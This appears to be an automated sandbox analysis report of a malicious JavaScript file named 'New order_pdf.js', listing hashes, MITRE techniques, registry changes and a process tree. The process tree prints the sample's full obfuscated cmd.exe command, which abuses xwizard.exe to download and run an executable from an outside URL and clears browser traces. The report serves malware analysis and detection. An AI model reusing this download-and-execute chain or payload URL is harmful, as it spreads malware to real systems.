7b979e6e64a9fe84467dbb0ebc197f99280fb9dcd6e7675238d898902a570a2a

General

Target

New order_pdf.js
Size

612B
MD5

d875685d675d779c80ff67110838ba5b
SHA1

d79aeb0400d6e30375923ce08bdca636abb44dbd
SHA256

7b979e6e64a9fe84467dbb0ebc197f99280fb9dcd6e7675238d898902a570a2a
SHA512

2482ade29ce066832388da332f6682adcb1535a33c9c92220447e555bc83f3168f7fed12f2c403c4555a7b9c17f9aa4a8a3fb6cea7974405ed866d991e149036

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2932	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3280	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	rundll32.exe

Modifies registry class 16 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\MuiCache	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache	rundll32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3280	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4076	rundll32.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 4776	820	wscript.exe	86
PID 820 wrote to memory of 4776	820	wscript.exe	86
PID 4776 wrote to memory of 3908	4776	cmd.exe	89
PID 4776 wrote to memory of 3908	4776	cmd.exe	89
PID 4776 wrote to memory of 4076	4776	cmd.exe	90
PID 4776 wrote to memory of 4076	4776	cmd.exe	90
PID 4076 wrote to memory of 1416	4076	rundll32.exe	95
PID 4076 wrote to memory of 1416	4076	rundll32.exe	95
PID 4776 wrote to memory of 2972	4776	cmd.exe	96
PID 4776 wrote to memory of 2972	4776	cmd.exe	96
PID 4776 wrote to memory of 3896	4776	cmd.exe	98
PID 4776 wrote to memory of 3896	4776	cmd.exe	98
PID 2972 wrote to memory of 760	2972	cmd.exe	99
PID 2972 wrote to memory of 760	2972	cmd.exe	99
PID 2972 wrote to memory of 2932	2972	cmd.exe	100
PID 2972 wrote to memory of 2932	2972	cmd.exe	100
PID 2972 wrote to memory of 3280	2972	cmd.exe	101
PID 2972 wrote to memory of 3280	2972	cmd.exe	101
PID 4776 wrote to memory of 1148	4776	cmd.exe	102
PID 4776 wrote to memory of 1148	4776	cmd.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\New order_pdf.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C devicecreDEntIAldepLoymENt.EXE & RUNDLL32 INEtCPl.cpL , ClearMyTracksByProcess 8 && (ecHO DEviCeCrEdenTIalDepLoyMeNt ^& timEouT /t 7 /nObreaK ^&^& TAskkiLl.EXe /F /iM XwiZarD.eXe) > C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAT && STart C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt & xWizArD RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} -z https://najmuddin.com/p/Protected5.exe & FOR /f %a iN ( ' dIr C:\Users\Admin\AppData\Local\mICrosoFt\WindowS\INETcAchE\ie\ /s /B ' ) Do RUnDLl32.exe url.dll,FileProtocolHandler %a && Del C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\system32\DeviceCredentialDeployment.exe
    devicecreDEntIAldepLoymENt.EXE
    3⤵
    PID:3908
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 INEtCPl.cpL , ClearMyTracksByProcess 8
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4076
  - - C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000
      4⤵
      Modifies registry class
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\system32\DeviceCredentialDeployment.exe
      DEviCeCrEdenTIalDepLoyMeNt
      4⤵
      PID:760
  - - C:\Windows\system32\timeout.exe
      timEouT /t 7 /nObreaK
      4⤵
      Delays execution with timeout.exe
      PID:2932
  - - C:\Windows\system32\taskkill.exe
      TAskkiLl.EXe /F /iM XwiZarD.eXe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3280
- - C:\Windows\system32\xwizard.exe
    xWizArD RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} -z https://najmuddin.com/p/Protected5.exe
    3⤵
    PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dIr C:\Users\Admin\AppData\Local\mICrosoFt\WindowS\INETcAchE\ie\ /s /B
    3⤵
    PID:1148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAT

Filesize
87B

MD5
a9a006e7db555c3e71d0f2e2e05e3c7f

SHA1
773b35abcfdf9fd58714667c863a28dab6fafc02

SHA256
87e0e51e613eb16bf0ec059bfbd7faf0c067dc5afa9e33f85113f6565f54d92e

SHA512
59348bdfc1e0c6a1d742cb20b3f7f6ab59063a6ad9639b889d41c32f2d0fe89dbf0b95ec3ba8c4cc6bcbdf1e51009f20967983687e852eae8630758333cd9419

Download Submit

Analysis

Sharing